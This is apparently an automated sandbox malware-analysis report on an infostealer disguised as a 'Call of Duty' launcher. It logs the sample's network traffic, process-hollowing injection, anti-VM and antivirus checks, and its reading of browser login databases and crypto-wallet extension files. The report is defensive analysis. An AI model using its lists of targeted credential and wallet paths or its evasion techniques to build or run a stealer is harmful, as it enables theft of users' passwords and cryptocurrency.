              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 0_2_006BF4D00_2_006BF4D0
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 0_2_006C34D00_2_006C34D0
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 0_2_006C15A00_2_006C15A0
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 0_2_006BF9800_2_006BF980
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 0_2_006BCE700_2_006BCE70
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 0_2_006B86C00_2_006B86C0
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 0_2_006BD7F00_2_006BD7F0
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 0_2_006D1FD20_2_006D1FD2
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: String function: 006C55C0 appears 33 times
              Source: Call 0f Duty A1 Launcher.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: Call 0f Duty A1 Launcher.exeStatic PE information: Section: .coS ZLIB complexity 1.0003339213709677
              Source: classification engineClassification label: mal92.troj.spyw.evad.winEXE@4/0@1/2
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7280:120:WilError_03
              Source: Call 0f Duty A1 Launcher.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1714348837.0000000005D60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile read: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe "C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe"
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeProcess created: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe "C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe"
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeProcess created: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe "C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: Call 0f Duty A1 Launcher.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: Call 0f Duty A1 Launcher.exeStatic PE information: section name: .00cfg
              Source: Call 0f Duty A1 Launcher.exeStatic PE information: section name: .coS
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 0_2_006C4BC5 push ecx; ret 0_2_006C4BD8
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 2_3_03602478 push 0000005Ch; ret 2_3_0360247B
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 2_3_03602478 push 0000005Ch; ret 2_3_0360247B
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 2_3_03602478 push 0000005Ch; ret 2_3_0360247B
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 2_3_03602478 push 0000005Ch; ret 2_3_0360247B
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 2_3_03602478 push 0000005Ch; ret 2_3_0360247B
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 2_3_03602478 push 0000005Ch; ret 2_3_0360247B
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 2_3_03602478 push 0000005Ch; ret 2_3_0360247B
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 2_3_03602478 push 0000005Ch; ret 2_3_0360247B
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 2_3_0360354D push esp; ret 2_3_03603593
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 2_3_0360354D push esp; ret 2_3_03603593
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 2_3_0360354D push esp; ret 2_3_03603593
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 2_3_0360354D push esp; ret 2_3_03603593
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 2_3_0360354D push esp; ret 2_3_03603593
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 2_3_0360354D push esp; ret 2_3_03603593
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 2_3_0360354D push esp; ret 2_3_03603593
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 2_3_0360354D push esp; ret 2_3_03603593
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 2_3_035FD9ED push es; retf 2_3_035FDA2A
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 2_3_035FD9ED push es; retf 2_3_035FDA2A
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 2_3_035FD9ED push es; retf 2_3_035FDA2A
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 2_3_03603595 push ebx; ret 2_3_036035AB
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 2_3_03603595 push ebx; ret 2_3_036035AB
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 2_3_03603595 push ebx; ret 2_3_036035AB
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 2_3_03603595 push ebx; ret 2_3_036035AB
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 2_3_03603595 push ebx; ret 2_3_036035AB
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 2_3_03603595 push ebx; ret 2_3_036035AB
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 2_3_03603595 push ebx; ret 2_3_036035AB
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 2_3_03603595 push ebx; ret 2_3_036035AB
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 2_3_03602478 push 0000005Ch; ret 2_3_0360247B
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 2_3_03602478 push 0000005Ch; ret 2_3_0360247B
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 2_3_03602478 push 0000005Ch; ret 2_3_0360247B
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 0_2_006C4CA2 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_006C4CA2
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe TID: 7344Thread sleep time: -150000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe TID: 7348Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 0_2_006CC7DB FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_006CC7DB
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089619359.0000000003543000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000002.2090339829.0000000003543000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp/X
              Source: Call 0f Duty A1 Launcher.exe, Call 0f Duty A1 Launcher.exe, 00000002.00000002.2090379207.0000000003578000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089830085.0000000003577000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089619359.000000000356F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000002.2090379207.0000000003578000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089830085.0000000003577000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089619359.000000000356F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWi
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 0_2_006C5444 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_006C5444
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 0_2_006BCD10 mov eax, dword ptr fs:[00000030h]0_2_006BCD10
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 0_2_006DB18D mov edi, dword ptr fs:[00000030h]0_2_006DB18D
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 0_2_006BBD50 mov edi, dword ptr fs:[00000030h]0_2_006BBD50
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 0_2_006C9F90 GetProcessHeap,0_2_006C9F90
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 0_2_006C5444 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_006C5444
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 0_2_006C5438 SetUnhandledExceptionFilter,0_2_006C5438
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 0_2_006C7DCA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_006C7DCA
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 0_2_006C4AD9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_006C4AD9

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 0_2_006DB18D GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_006DB18D
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeMemory written: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeProcess created: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe "C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 0_2_006C5200 cpuid 0_2_006C5200
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 0_2_006C58C5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_006C58C5
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: Call 0f Duty A1 Launcher.exe, Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089564512.00000000035FF000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1861895397.00000000035FF000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1821410726.0000000003600000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000002.2090538848.0000000003600000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %\Windows Defender\MsMpeng.exe
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1807860141.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1807733461.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1807826105.00000000035FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: Process Memory Space: Call 0f Duty A1 Launcher.exe PID: 7328, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1711171222.00000000035D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Electrum\wallets~Kg
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1735240996.00000000035F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s/ElectronCash
              Source: Call 0f Duty A1 Launcher.exeString found in binary or memory: Jaxx Liberty
              Source: Call 0f Duty A1 Launcher.exeString found in binary or memory: ExodusWeb3
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1756574371.00000000035E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1756574371.00000000035E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1711171222.00000000035D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
